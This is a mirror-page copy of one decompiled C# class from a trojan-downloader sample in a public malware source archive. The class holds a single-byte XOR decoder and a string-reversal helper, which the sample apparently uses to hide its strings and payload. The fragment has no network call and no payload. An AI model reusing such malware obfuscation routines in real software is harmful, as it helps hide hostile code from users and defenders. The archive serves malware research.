mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-20 10:26:10 +00:00
30 lines
1.1 KiB
C#
30 lines
1.1 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: wisp1ff1rpzacn3jgfnasrkhmiolo44qt
|
|||
|
// Assembly: hh2ifwz3, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: 68766CC0-7547-4113-80E9-8D0602728CEB
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.exe
|
|||
|
|
|||
|
using System;
|
|||
|
|
|||
|
public static class wisp1ff1rpzacn3jgfnasrkhmiolo44qt
|
|||
|
{
|
|||
|
public static int jqzvokzk5t335inc0xp55epz5 = 129;
|
|||
|
|
|||
|
public static byte[] br40vohypenwwv4th(byte[] Zkk3bd233f1xrgcd4m411ibwr)
|
|||
|
{
|
|||
|
for (int index = 0; index < Zkk3bd233f1xrgcd4m411ibwr.Length; ++index)
|
|||
|
{
|
|||
|
char ch = (char) ((uint) Convert.ToChar(Zkk3bd233f1xrgcd4m411ibwr[index]) ^ (uint) wisp1ff1rpzacn3jgfnasrkhmiolo44qt.jqzvokzk5t335inc0xp55epz5);
|
|||
|
Zkk3bd233f1xrgcd4m411ibwr[index] = Convert.ToByte(ch);
|
|||
|
}
|
|||
|
return Zkk3bd233f1xrgcd4m411ibwr;
|
|||
|
}
|
|||
|
|
|||
|
public static string Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(string s)
|
|||
|
{
|
|||
|
char[] charArray = s.ToCharArray();
|
|||
|
Array.Reverse((Array) charArray);
|
|||
|
return new string(charArray);
|
|||
|
}
|
|||
|
}
|